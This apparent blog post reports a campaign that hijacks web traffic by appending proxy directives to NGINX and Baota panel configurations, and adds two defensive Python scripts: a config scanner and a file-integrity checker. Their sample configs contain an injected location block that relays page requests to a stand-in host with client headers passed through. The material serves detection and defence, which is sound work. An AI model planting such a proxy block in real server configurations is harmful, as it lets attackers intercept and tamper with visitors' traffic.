Tag: Asia top-level domains

  • The Invisible Proxy: How Hackers Are Weaponizing NGINX and Baota Panels to Hijack Web Traffic

    Security researchers at Datadog have identified an ongoing traffic-interception campaign targeting NGINX servers and hosting control panels, most notably the Baota panel that is widely used across Asia. The attackers quietly add malicious directives to server configurations so that visitors' requests are routed through servers under their control, which puts them in a man-in-the-middle position between a website and its users.

    The campaign is attributed to a threat actor previously linked to the React2Shell exploit. The group now uses automated scripts to modify NGINX settings. Because the injected rules still let legitimate requests through, administrators may not notice the compromise for a long time, while a portion of the traffic is diverted to attacker-controlled servers where it can be analysed, altered, or laced with fraudulent advertisements and scams.

    The campaign mainly targets national domain zones, most of them in Asia, including .in, .id, .pe, .bd and .th, with a particular focus on educational and government institutions. Servers administered through the Chinese Baota control panel, a staple among hosting providers in the region, receive special attention.

    The researchers point out that the attack uses NGINX's own built-in features rather than a bug in the server. The malicious directives are inserted into location blocks and rely on the proxy and rewrite functionality, so an incoming request looks routine but is handed off to a second server. To keep the interception inconspicuous, the attackers also rewrite HTTP headers so that the diverted requests still carry what appears to be the original client's information.
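    What such an injected block looks like, and how to hunt for it across an effective configuration, as an added example that is not part of the article or of Datadog's tooling. The scanner below walks every location block, flags proxy_pass, rewrite and return targets that point at a host the server is not expected to talk to, and records which client-identifying headers the block rewrites. The allow-list, the watched header names and the sample vhost (with a relay on a TEST-NET address) are all assumptions constructed for this example; the article names no specific headers or hosts. Feed it a single config file or, better, the output of `nginx -T`, which prints the full configuration with every include resolved.

```python
"""Flag NGINX location blocks that proxy or redirect visitors to an unexpected host.
Added example for the campaign described above; not Datadog's or NGINX's own code.
Usage: python nginx_relay_scan.py [path-to-config-or-nginx-T-output]
Without an argument it scans the constructed SAMPLE_CONFIG at the bottom."""
import re
import sys
from ipaddress import ip_address
from urllib.parse import urlsplit

# Upstream hosts this server is expected to proxy to (assumption: adjust per host;
# named "upstream { }" blocks found in the config are added automatically).
ALLOWED_UPSTREAMS = {"localhost", "127.0.0.1", "::1"}

# Headers an injected block is likely to rewrite so the diverted request still looks
# like the original client's (assumption; the article does not name the headers).
WATCHED_HEADERS = {"host", "x-forwarded-for", "x-real-ip", "user-agent", "referer", "cookie"}

LOCATION_RE = re.compile(r"\blocation\s+([^{]+?)\s*\{")
UPSTREAM_RE = re.compile(r"\bupstream\s+(\S+)\s*\{")
DIRECTIVE_RE = re.compile(r"^\s*(proxy_pass|proxy_set_header|rewrite|return)\s+([^;]+);", re.M)


def strip_comments(text):
    """Drop '#' comments so a commented-out block is not reported."""
    return "\n".join(line.split("#", 1)[0] for line in text.splitlines())


def location_blocks(text):
    """Yield (matcher, body) for each location block by counting braces.
    A nested location is yielded on its own and also appears inside its parent's body."""
    for m in LOCATION_RE.finditer(text):
        depth, i = 1, m.end()
        while i < len(text) and depth:
            depth += {"{": 1, "}": -1}.get(text[i], 0)
            i += 1
        yield m.group(1).strip(), text[m.end():i - 1]


def target_host(target):
    """Hostname of a proxy_pass/rewrite/return target; None when it is not a URL."""
    return urlsplit(target.strip("\"'")).hostname


def is_external(host, allowed):
    """True when the host is neither loopback, nor a named upstream, nor allow-listed.
    NGINX variables such as $host cannot be resolved statically and are not flagged."""
    if host is None or host.startswith("$") or host in allowed:
        return False
    try:
        return not ip_address(host).is_loopback
    except ValueError:
        return True  # a hostname this server was not expected to talk to


def scan(config_text):
    """Return one finding per location block that sends traffic off-box."""
    text = strip_comments(config_text)
    allowed = ALLOWED_UPSTREAMS | set(UPSTREAM_RE.findall(text))
    findings = []
    for matcher, body in location_blocks(text):
        reasons, rewritten = [], []
        for name, args in DIRECTIVE_RE.findall(body):
            tokens = args.split()
            if name == "proxy_pass" and is_external(target_host(tokens[0]), allowed):
                reasons.append(f"proxy_pass to {tokens[0]}")
            elif name in ("rewrite", "return"):
                reasons += [f"{name} sends clients to {t}" for t in tokens
                            if "://" in t and is_external(target_host(t), allowed)]
            elif name == "proxy_set_header" and tokens[0].lower() in WATCHED_HEADERS:
                rewritten.append(tokens[0].lower())
        if reasons:
            findings.append({"location": matcher, "reasons": reasons, "headers": rewritten})
    return findings


# Constructed sample: a Baota-style vhost with a legitimate local proxy, an HTTPS
# redirect, and one injected block that diverts page requests to a relay (203.0.113.10
# is a documentation address standing in for attacker infrastructure).
SAMPLE_CONFIG = r"""
upstream app { server 127.0.0.1:9000; }
server {
    listen 80;
    server_name www.example.edu;
    root /www/wwwroot/www.example.edu;

    location / { index index.html; }

    location /api/ {
        proxy_pass http://app;
        proxy_set_header X-Real-IP $remote_addr;
    }

    location /login/ { return 301 https://$host$request_uri; }

    location ~* \.(php|html)$ {
        proxy_pass http://203.0.113.10:8080;
        proxy_set_header Host $host;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header User-Agent $http_user_agent;
    }
}
"""

if __name__ == "__main__":
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CONFIG
    for f in scan(source):
        print(f"location {f['location']}: {'; '.join(f['reasons'])}"
              f" (rewrites headers: {', '.join(f['headers']) or 'none'})")
```

    On the sample the only finding is the regex location matching .php and .html requests, which is exactly the shape to look for: a broad matcher placed after the panel's own blocks, an off-box proxy_pass, and Host, X-Forwarded-For and User-Agent copied through so the relay sees genuine client data. A proxy_pass to a variable is not flagged here because it cannot be resolved statically; treat any such block in a panel-generated vhost as worth reading by hand.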

    The toolset works in stages. A first-stage script fetches the remaining components, with fallbacks for hosts where the usual download utilities are unavailable. Dedicated modules then locate the NGINX and Baota configuration files, check whether they have already been infected, and append the malicious snippets to them. To keep the site running and avoid raising alerts, the scripts validate the configuration and then perform a graceful reload, which keeps the master process up and causes no visible downtime; only if that fails do they force a restart.

    More advanced versions of the scripts can handle the different configuration paths used by various Linux distributions and containerised deployments. They keep a record of compromised domains and build an overall map of the infection, which is sent back to the command-and-control (C2) infrastructure.

    Administrators are advised to review NGINX configuration files for unexpected proxy rules and unfamiliar location blocks, especially on servers managed through hosting control panels; since the snippets are appended to existing files and the panel generates many per-site includes, review the effective configuration rather than a single file. File integrity monitoring on the configuration directories and auditing of every service reload or restart are also recommended, so that unauthorised changes are caught quickly and the interception cut off. Note that a graceful reload does not restart the master process, so process uptime alone will not reveal it; the NGINX error log and the init system's journal record reloads.
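    A minimal baseline-and-diff integrity check for the configuration directories, as an added example that is not part of the article or any vendor tool. It hashes every file under the watched directories, stores a manifest, and reports files that were added, removed or modified on the next run; the built-in demo reproduces the append-to-an-existing-vhost pattern in a temporary directory. The directory list is an assumption (the Baota vhost path is the one the panel is commonly configured to use; adjust it to your installation), and the demo's vhost content and relay address are constructed.

```python
"""Hash-manifest integrity check for NGINX and control-panel config directories.
Added example; not part of the article or of any vendor tool.
  python config_fim.py baseline manifest.json   # record the known-good state
  python config_fim.py check manifest.json      # report added/removed/modified files
  python config_fim.py                          # run the constructed demo below"""
import hashlib
import json
import os
import sys
import tempfile

# Directories whose contents should change only during planned maintenance.
# Assumption: /www/server/panel/vhost/nginx is where the Baota panel writes vhosts.
WATCHED_DIRS = ["/etc/nginx", "/www/server/panel/vhost/nginx", "/www/server/nginx/conf"]


def file_digest(path):
    """SHA-256 of a file, read in chunks so large files do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(dirs):
    """Map path -> {sha256, size, mtime} for every file under dirs (missing dirs are skipped)."""
    manifest = {}
    for d in dirs:
        for root, _, files in os.walk(d):
            for name in files:
                p = os.path.join(root, name)
                try:
                    st = os.stat(p)
                    manifest[p] = {"sha256": file_digest(p), "size": st.st_size, "mtime": int(st.st_mtime)}
                except OSError:
                    continue  # unreadable or vanished between walk and stat
    return manifest


def diff(baseline, current):
    """Compare two manifests by content hash; mtimes are informational only."""
    base, cur = set(baseline), set(current)
    return {
        "added": sorted(cur - base),
        "removed": sorted(base - cur),
        "modified": sorted(p for p in base & cur if baseline[p]["sha256"] != current[p]["sha256"]),
    }


def demo():
    """Constructed walk-through: baseline a fake vhost directory, then simulate the
    appended proxy block plus an extra dropped include and return what diff reports."""
    with tempfile.TemporaryDirectory() as tmp:
        vhost = os.path.join(tmp, "www.example.edu.conf")
        with open(vhost, "w") as fh:
            fh.write("server { listen 80; root /www/wwwroot/www.example.edu; }\n")
        baseline = snapshot([tmp])
        with open(vhost, "a") as fh:  # appended, not replaced, as described above
            fh.write("location ~* \\.php$ { proxy_pass http://203.0.113.10:8080; }\n")
        with open(os.path.join(tmp, "zz-relay.conf"), "w") as fh:
            fh.write("# extra include dropped next to the real vhosts\n")
        report = diff(baseline, snapshot([tmp]))
        return {k: [os.path.basename(p) for p in v] for k, v in report.items()}


if __name__ == "__main__":
    if len(sys.argv) == 3 and sys.argv[1] == "baseline":
        with open(sys.argv[2], "w") as out:
            json.dump(snapshot(WATCHED_DIRS), out, indent=1)
    elif len(sys.argv) == 3 and sys.argv[1] == "check":
        with open(sys.argv[2]) as inp:
            print(json.dumps(diff(json.load(inp), snapshot(WATCHED_DIRS)), indent=1))
    else:
        print(json.dumps(demo(), indent=1))
```

    Keep the baseline manifest off the host (or at least somewhere the web server's user cannot write), since anything that can rewrite the vhosts can rewrite a manifest stored beside them, and compare by hash rather than by timestamp: a script running as root can reset mtimes. Run the check from cron or your monitoring agent and alert on any non-empty result outside a change window, then pair it with a review of the reload events in the NGINX error log and the service journal for the same period.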